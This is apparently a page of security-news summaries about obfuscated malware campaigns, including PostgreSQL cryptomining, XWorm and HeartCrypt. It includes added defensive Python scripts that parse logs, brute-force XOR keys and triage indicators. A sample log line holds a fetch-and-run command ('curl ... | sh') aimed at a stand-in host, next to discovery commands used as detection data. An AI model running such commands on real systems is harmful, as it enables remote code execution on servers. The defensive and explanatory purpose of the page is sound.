obfuscation techniques

Tech Optimizer
April 2, 2025
A malware campaign has compromised over 1,500 PostgreSQL servers, using fileless techniques to deploy cryptomining payloads. The attack, attributed to the threat actor JINX-0126, targets publicly exposed PostgreSQL instances with weak or default credentials. Once authenticated, the attackers abuse PostgreSQL's COPY ... FROM PROGRAM command, which runs an arbitrary shell command on the database host as the server's operating-system user and is available only to superusers and members of the pg_execute_server_program role, to run system discovery commands and execute the malicious payloads. They rely on evasion tactics such as a unique hash for each dropped binary and fileless execution of the miner, which makes signature-based detection difficult. The malware includes a binary named "postmaster", which mimics the legitimate PostgreSQL server process, and a secondary binary named "cpu_hu" that performs the mining. Nearly 90% of cloud environments host PostgreSQL databases, and about one-third of those instances are publicly exposed, giving attackers easy entry points. Each wallet associated with the campaign had around 550 active mining workers, indicating the scale of the attack. Organizations are advised to harden their PostgreSQL instances: require strong passwords, do not expose the database to the internet, and do not grant superuser or pg_execute_server_program to application roles.
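The abuse described above leaves a clear trace when statement logging is on: every COPY ... FROM PROGRAM call, together with the shell command it ran, appears in the PostgreSQL log. The following detector is an added example, not code from the campaign report or from the affected organisations. It parses constructed log lines (assumed to use log_statement = 'all' and a log_line_prefix of '%m [%p] %u@%d %h '), extracts the program string from each COPY ... PROGRAM statement, and marks those whose command is a typical discovery command. The log lines, addresses and commands are made up for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed PostgreSQL log lines for this example (log_statement = 'all',
# log_line_prefix = '%m [%p] %u@%d %h '). Not taken from the campaign report.
SAMPLE_LOG = """\
2025-04-01 10:12:03.117 UTC [2231] app@orders 10.0.4.12 LOG:  statement: SELECT id FROM orders WHERE id = 42
2025-04-01 10:15:44.902 UTC [2290] postgres@postgres 203.0.113.57 LOG:  statement: COPY cmd_out FROM PROGRAM 'curl -s http://203.0.113.9/x.sh | sh'
2025-04-01 10:15:45.010 UTC [2290] postgres@postgres 203.0.113.57 LOG:  statement: COPY sysinfo FROM PROGRAM 'uname -a; id; nproc'
2025-04-01 10:16:01.330 UTC [2301] etl@warehouse 10.0.4.20 LOG:  statement: COPY staging FROM '/var/lib/postgresql/import/batch.csv' CSV
2025-04-01 10:16:09.008 UTC [2290] postgres@postgres 203.0.113.57 LOG:  statement: COPY cmd_out FROM PROGRAM 'sh -c ''nohup /tmp/.x/postmaster &'''
"""

# One log line: timestamp (3 tokens), [pid], user@db, client host, statement.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<host>\S+) LOG:\s+statement: (?P<stmt>.*)$"
)

# COPY ... FROM|TO PROGRAM '<shell command>'; SQL doubles embedded quotes ('').
PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+'((?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)

# Commands an intruder runs first to size up the host (assumed list).
DISCOVERY_CMDS = {"uname", "id", "whoami", "hostname", "nproc", "lscpu",
                  "ps", "netstat", "ifconfig", "ip"}


@dataclass
class Finding:
    pid: int
    user: str
    db: str
    host: str
    program: str      # the shell command passed to PROGRAM, unescaped
    discovery: bool   # True if the command is a host-discovery command


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into its prefix fields and the SQL statement."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_copy_program(log_text: str) -> List[Finding]:
    """Return one Finding per COPY ... PROGRAM statement in the log text."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        m = PROGRAM_RE.search(rec["stmt"])
        if not m:
            continue                      # plain COPY from a file is normal ETL
        program = m.group(1).replace("''", "'")
        # Split on shell separators so 'uname -a; id' yields uname and id.
        tokens = set(re.split(r"[\s;|&()]+", program))
        findings.append(Finding(int(rec["pid"]), rec["user"], rec["db"],
                                rec["host"], program,
                                bool(tokens & DISCOVERY_CMDS)))
    return findings


if __name__ == "__main__":
    for f in find_copy_program(SAMPLE_LOG):
        flag = "DISCOVERY" if f.discovery else "EXEC"
        print(f"[{flag}] pid={f.pid} {f.user}@{f.db} from {f.host}: {f.program}")
```

Any hit is worth a look: legitimate workloads rarely need COPY ... PROGRAM, and a hit from a non-local client address using the postgres superuser is the pattern the campaign relies on. Note that log_statement = 'mod' also records COPY FROM, but 'all' is needed to see COPY TO PROGRAM as well.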
AppWizard
March 18, 2025
Security researchers at Bitdefender have identified a major ad fraud operation involving 331 malicious applications on the Google Play Store with over 60 million downloads combined. The apps use techniques that bypass Android 13's security restrictions to conduct ad fraud, phishing, and credential theft. They disguise themselves as utility tools, such as QR scanners and health apps, and display intrusive full-screen ads even when the app is not in use. They also attempt to collect sensitive user data without requesting the permissions such collection would normally require, indicating deliberate manipulation of Android APIs. To evade detection the attackers hide app icons, launch activities without user interaction, and use persistence mechanisms to remain active on devices. Most of the apps first appeared on Google Play in the third quarter of 2024, initially benign and later updated with malicious features. The latest malware was uploaded to the Play Store as recently as March 4, 2025, and 15 apps were still available for download at the time of the investigation. The attackers likely operate as a single entity or as a collective using the same packaging tools bought on black markets. They use layered obfuscation to avoid detection, including string obfuscation, polymorphic encryption, runtime checks for debuggers, and native libraries obfuscated with specialized tools. The case highlights gaps in Android's security framework and emphasizes the need for robust third-party security solutions, as attackers continue to adapt their methods.
Tech Optimizer
March 12, 2025
Microsoft Threat Intelligence has identified a new variant of the XCSSET malware targeting macOS, specifically aimed at software developers who share Xcode project files. This variant features enhanced obfuscation techniques, updated persistence mechanisms, and a four-stage infection chain that begins with an obfuscated shell payload activated during the building of an infected Xcode project. The malware communicates with a command-and-control (C2) server to download additional payloads and employs encoding methods to hinder detection. It checks the version of XProtect to evade detection and modifies shell configuration files for persistence. The final stage involves an AppleScript payload that collects system information and redirects logs to the C2 server. The malware includes sub-modules for various malicious activities, such as stealing system information and extracting digital wallet data. Although observed in a limited number of attacks, its advanced capabilities pose a significant threat to macOS users. Users are advised to exercise caution with Xcode projects, keep systems updated, and use robust antivirus software.
Winsage
February 19, 2025
Cybersecurity experts at Fortinet have identified a new Snake Keylogger variant, which has been tied to over 280 million blocked infection attempts. The malware uses layered obfuscation that makes it difficult to detect and neutralize, and it poses a risk to individuals and organizations by giving attackers access to sensitive data. Cybersecurity professionals recommend proactive defense strategies, including keeping antivirus software updated and educating users about phishing. Fortinet has not revealed the creators of the Snake Keylogger or the specific industries it targets.
Winsage
February 19, 2025
Recent reports indicate a surge in activity of the Snake keylogger, also known as the 404 Keylogger, linked to over 280 million attack attempts since the start of the year. At its peak it was responsible for as many as 14 million infection attempts in a single day. The malware logs keystrokes and extracts personally identifiable information, including geolocation data, and transmits it to its command server over channels such as SMTP, Telegram bots, and HTTP POST requests. The variant is built with AutoIt and copies itself into the Windows Startup folder so that it runs after every system restart. It uses obfuscation to evade antivirus detection and injects its code into processes the operating system treats as legitimate. The keylogger primarily spreads through phishing emails.
Winsage
December 17, 2024
The Securonix Threat Research team has identified a phishing campaign, named "FLUX#CONSOLE", that uses tax-related lures and Microsoft Common Console Document (MSC) files to deliver a backdoor payload. The attack begins with a phishing email carrying an MSC file disguised as a PDF titled "Income-Tax-Deduction-and-Rebates202441712.pdf"; opening it displays a decoy PDF while the MSC file executes malicious payloads. The campaign combines tax-themed lures, abuse of MSC files, DLL sideloading through Dism.exe, persistence through scheduled tasks, and layered obfuscation. The MSC file contains XML commands that download or extract a malicious DLL named DismCore.dll, which is then sideloaded by the legitimate Dism.exe. The malware communicates with a command-and-control server at "hxxps://siasat[.]top", exfiltrating data over encrypted HTTPS traffic. The attackers maintained access for about 24 hours, targeting victims in Pakistan. The tactics do not match any known advanced persistent threat group, and the campaign highlights the growing use of MSC files as a malware delivery method. Indicators of Compromise (IOCs) include the C2 address siasat[.]top and the hashes of the analyzed files.
Tech Optimizer
December 14, 2024
HeartCrypt is a packer-as-a-service (PaaS) developed in July 2023 and launched in February 2024, designed to help malware operators evade antivirus detection. It has been used to pack over 2,000 malicious payloads across 45 malware families. HeartCrypt injects its code into legitimate executable files, complicating detection by antivirus software. It is promoted on underground forums and Telegram channels and charges a fee per file for packing Windows x86 and .NET payloads. Its clients include operators of malware families such as LummaStealer, Remcos, and Rhadamanthys. The packing process involves several techniques:
- Payload execution: the payload is encrypted with a single-byte XOR operation and executed through process hollowing or .NET framework capabilities.
- Stub creation: position-independent code (PIC) is inserted into the binary's .text section.
- Control flow hijacking: the entry point of the original binary is altered to redirect execution to the malicious PIC.
- Resource addition: resources disguised as BMP files carry the encoded malicious code.
- Obfuscation: multiple layers of encoding are used, including stack strings and dynamic API resolution.
HeartCrypt also employs anti-analysis techniques such as loading non-existent DLLs to detect sandbox environments and using virtual DLLs to evade Windows Defender's emulator. The service lowers the entry barrier for malware operators and is likely to increase infections. Security researchers have analyzed HeartCrypt payloads, revealing insights into its operations and the malware campaigns that use it.
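A single-byte XOR layer is cheap to undo once you know what the plaintext must look like. The script below is an added example, not code from the packer or from the researchers' write-up: it builds a constructed stand-in for a HeartCrypt-style resource (a BMP file header followed by a minimal PE-like image XOR-encoded with one byte), then brute-forces all 256 keys and accepts the one that yields an MZ header, the DOS stub string and an e_lfanew that lands on a "PE\0\0" signature. The resource layout and the sample image are assumptions made for the example; real resources may carry a different prefix.

```python
import struct

DOS_STUB = b"This program cannot be run in DOS mode"


def looks_like_pe(data: bytes) -> bool:
    """True when data has an MZ header, the DOS stub string and an
    e_lfanew (offset 0x3C) that points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ" or DOS_STUB not in data:
        return False
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def resource_body_offset(blob: bytes) -> int:
    """If the resource is disguised as a BMP, skip to the pixel-data offset
    (bfOffBits, bytes 10..13 of the BMP header); otherwise start at 0."""
    if blob[:2] == b"BM" and len(blob) >= 14:
        return struct.unpack_from("<I", blob, 10)[0]
    return 0


def recover_xor_key(blob: bytes):
    """Try every single-byte key on the resource body and return
    (key, decoded_bytes) for the first key that yields a PE image, else None."""
    body = blob[resource_body_offset(blob):]
    for key in range(256):
        decoded = bytes(b ^ key for b in body)
        if looks_like_pe(decoded):
            return key, decoded
    return None


def build_fake_resource(key: int) -> bytes:
    """Constructed stand-in for a packed resource (not a real sample): a
    14-byte BMP file header followed by a minimal PE-like image XOR-encoded
    with `key`. Only the headers are realistic; there is no code in it."""
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)   # e_lfanew = 0x80
    dos_stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21"            # usual stub prologue
                + DOS_STUB + b".\r\r\n$")
    image = (dos_header + dos_stub).ljust(0x80, b"\x00") + b"PE\x00\x00" + bytes(range(256))
    encoded = bytes(b ^ key for b in image)
    bmp_header = (b"BM" + struct.pack("<I", 14 + len(encoded))     # bfSize
                  + b"\x00\x00\x00\x00"                            # reserved
                  + struct.pack("<I", 14))                         # bfOffBits
    return bmp_header + encoded


if __name__ == "__main__":
    blob = build_fake_resource(0x5A)
    key, image = recover_xor_key(blob)
    print(f"key=0x{key:02x}, decoded {len(image)} bytes, "
          f"PE signature at 0x{struct.unpack_from('<I', image, 0x3C)[0]:x}")
```

Because XOR with a fixed key is a bijection, only one key can turn the first two bytes into "MZ", so the search is exact rather than statistical; the DOS-stub and e_lfanew checks guard against a stray "MZ" in random data. A multi-byte or rolling key would need a known-plaintext attack on the header instead, which this example does not cover.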
Winsage
November 12, 2024
Threat actors have enhanced the Remcos remote access tool, making it a more sophisticated malware variant by using multiple layers of scripting languages to evade detection. This new campaign exploits a known remote code execution vulnerability in unpatched Microsoft Office and WordPad applications, initiated through a phishing email containing a disguised Excel file. The malware employs various encoding methods and obfuscation techniques to avoid analysis, including the use of PowerShell scripts and API hooking. It gathers information from the victim's device and transmits it to a command and control server. Experts emphasize the importance of patching, employee training, and robust endpoint protection to defend against such attacks.
AppWizard
November 6, 2024
A new Android malware named "ToxicPanda" was first identified in late October 2024 and has been reclassified as a unique entity after initial classification under the TgToxic family. It poses a risk through account takeover via on-device fraud and primarily targets retail banking applications on Android devices. The malware has spread significantly in Italy, Portugal, Spain, and various Latin American regions, with over 1,500 devices reported as victims. ToxicPanda allows cybercriminals to gain remote access to infected devices, intercept one-time passwords, and bypass two-factor authentication. The threat actors are likely Chinese speakers, which is unusual for targeting European banking. The malware spreads through social engineering tactics, encouraging users to side-load the malicious app, and exploits Android’s accessibility services for elevated permissions. Cleafy’s analysis indicates that ToxicPanda's command-and-control infrastructure shows evolving operational strategies, and the malware may undergo further modifications. The challenges for security professionals are increasing as malware operators refine their tactics and expand their targets. Cleafy noted that contemporary antivirus solutions have struggled to detect ToxicPanda due to a lack of proactive, real-time detection systems.
Winsage
October 1, 2024
XWorm is a sophisticated strain of malware known for its obfuscation and stealth. A new variant, identified by researchers from Netskope, is delivered through Windows Script Files and has reached version 5.6 since the family was first identified in 2022. The infection starts with a Windows Script File (WSF) that downloads an obfuscated PowerShell script from paste[.]ee, which writes "VsLabs.vbs", "VsEnhance.bat", and "VsLabsData.ps1" to the C:\ProgramData\Music\Visuals directory. It creates a scheduled task named "MicroSoftVisualsUpdater" for persistence. XWorm uses evasion techniques such as reflective code loading and process injection into legitimate processes. It communicates with its command and control (C2) server over TCP sockets, using AES-ECB encryption with a key derived from a modified MD5 hash. Version 5.6 adds features such as the ability to remove plugins and a "Pong" command for response-time reporting. The malware performs extensive reconnaissance on infected systems, alerts the operators via Telegram, and can access sensitive information, establish remote access, and deploy additional malware. It modifies the hosts file to redirect name resolution and can launch Distributed Denial of Service (DDoS) attacks. XWorm captures screenshots, executes system commands, and downloads additional payloads while maintaining stealth through process monitoring. It uses a structured message format for C2 communication that embeds system information.
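The persistence and hosts-file artifacts named above can be checked offline against data already collected from a host. The script below is an added example, not code from Netskope or from the malware: it matches a list of scheduled-task names and file paths against the XWorm indicators, and parses a hosts file to list every entry other than the stock loopback lines, since any such entry redirects a name without going through DNS. The sample task list, file listing and hosts file are constructed for the example; a real triage would feed it the output of schtasks /query, a directory listing and %SystemRoot%\System32\drivers\etc\hosts.

```python
import ipaddress
from typing import Dict, List, Tuple

# Indicators as given in the summary above. Windows compares task and file
# names case-insensitively, so the matching below does too.
TASK_NAME = "MicroSoftVisualsUpdater"
DROP_DIR = r"C:\ProgramData\Music\Visuals"
DROPPED_FILES = {"vslabs.vbs", "vsenhance.bat", "vslabsdata.ps1"}


def suspicious_hosts_entries(hosts_text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs from a hosts file other than the
    stock loopback entries. Each one overrides DNS for that name; an analyst
    still decides whether it is benign (e.g. a local ad-block list)."""
    hits = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blanks
        if not line:
            continue
        addr_text, *names = line.split()
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            continue                                # malformed line, not an entry
        for name in names:
            if addr.is_loopback and name.lower() in {"localhost", "localhost.localdomain"}:
                continue
            hits.append((addr_text, name))
    return hits


def triage_xworm(tasks: List[str], files: List[str], hosts_text: str) -> Dict[str, list]:
    """Match collected host artifacts against the XWorm indicators."""
    task_hits = [t for t in tasks if t.strip("\\").lower() == TASK_NAME.lower()]
    file_hits = []
    for path in files:
        directory, _, name = path.rpartition("\\")
        if directory.lower() == DROP_DIR.lower() and name.lower() in DROPPED_FILES:
            file_hits.append(path)
    return {
        "scheduled_task": task_hits,
        "dropped_files": file_hits,
        "hosts_redirects": suspicious_hosts_entries(hosts_text),
    }


# Constructed sample collections for this example (not from a real host).
SAMPLE_TASKS = [
    r"\Microsoft\Windows\UpdateOrchestrator\Schedule Scan",
    r"\MicroSoftVisualsUpdater",
    r"\GoogleUpdateTaskMachineUA",
]
SAMPLE_FILES = [
    r"C:\ProgramData\Music\Visuals\VsLabs.vbs",
    r"C:\ProgramData\Music\Visuals\VsLabsData.ps1",
    r"C:\Users\bob\Desktop\notes.txt",
]
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.10    update.example-av.com
0.0.0.0         telemetry.example.net
"""

if __name__ == "__main__":
    for kind, hits in triage_xworm(SAMPLE_TASKS, SAMPLE_FILES, SAMPLE_HOSTS).items():
        print(f"{kind}: {hits or 'none'}")
```

Indicator matching on its own is brittle, since a new build can rename the task and the drop directory; the hosts-file check is the more durable part, because the redirection has to land in that file regardless of what the loader is called.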